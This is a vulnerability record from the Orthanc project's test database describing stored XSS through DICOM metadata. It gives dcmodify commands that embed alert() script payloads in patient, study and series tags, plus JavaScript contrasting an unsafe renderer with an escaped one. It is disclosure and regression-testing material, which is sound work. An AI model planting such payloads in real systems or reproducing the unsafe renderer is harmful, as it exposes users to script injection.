view Database/2017-06-27-XSSInjection.txt @ 146:5ba7b2417544

Added tag Orthanc-1.4.0 for changeset 69fecf5a3ff6
author Sebastien Jodogne <s.jodogne@gmail.com>
date Fri, 13 Jul 2018 16:40:18 +0200
parents 4a8df7a0d0b9
children

Stored Cross Site Scripting (XSS)
---------------------------------

- Application: Orthanc (1.2.0)
- Researcher: Victor Pasnkel (Morphus Labs)
- Vector: XSS payload stored in DICOM file metadata (patient/study/series tag values)
- The crafted file can be uploaded to the Web application, which then renders the stored tag values
- Tested on: OSX El Capitan (10.11.6)

Source:
https://drive.google.com/open?id=0B5BZfMPc1T-Ib004SExMZXFNSDg


Generation of sample file
-------------------------

# cp DummyCT.dcm 2017-06-27-XSSInjection.dcm
# dcmodify -m 'PatientName=HelloWorld<script>alert("XSS inside DICOM file 1");</script>' \
           -m 'StudyDescription=MyStudy<script>alert("XSS inside DICOM file 2");</script>' \
           -m 'SeriesDescription=MySeries<script>alert("XSS inside DICOM file 3");</script>' \
           2017-06-27-XSSInjection.dcm
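The fix on the web side is output encoding: every DICOM tag value must be HTML-escaped (or inserted via a text node) before it reaches the page. The following is an added example, not Orthanc's own code; it renders a tag table built from values modelled on the sample file above, once unsafely and once escaped, so the difference can be checked.

```javascript
// Added example (not Orthanc's code). Demonstrates why stored DICOM tag
// values must be output-encoded before being rendered in the browser.

// Minimal HTML entity escaping for the five characters that matter in
// text and attribute contexts.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable pattern: tag values interpolated straight into markup.
// A PatientName such as the one generated above executes on page load.
function renderTagTableUnsafe(tags) {
  const rows = Object.entries(tags)
    .map(([keyword, value]) => `<tr><td>${keyword}</td><td>${value}</td></tr>`)
    .join('');
  return `<table>${rows}</table>`;
}

// Hardened pattern: only the fixed markup is trusted; keywords and values
// are escaped so the payload is displayed as literal text.
// (When a DOM is available, assigning element.textContent is equivalent.)
function renderTagTable(tags) {
  const rows = Object.entries(tags)
    .map(([keyword, value]) =>
      `<tr><td>${escapeHtml(keyword)}</td><td>${escapeHtml(value)}</td></tr>`)
    .join('');
  return `<table>${rows}</table>`;
}

// Constructed input modelled on the dcmodify invocation above
// (what a simplified-tags JSON for that file would contain).
const SAMPLE_TAGS = {
  PatientName: 'HelloWorld<script>alert("XSS inside DICOM file 1");</script>',
  StudyDescription: 'MyStudy<script>alert("XSS inside DICOM file 2");</script>',
  SeriesDescription: 'MySeries<script>alert("XSS inside DICOM file 3");</script>',
};

// Simple regression check: the hardened renderer must never emit a raw
// <script> tag, whatever the stored values contain.
function rendersWithoutScript(tags) {
  return !/<script/i.test(renderTagTable(tags));
}
```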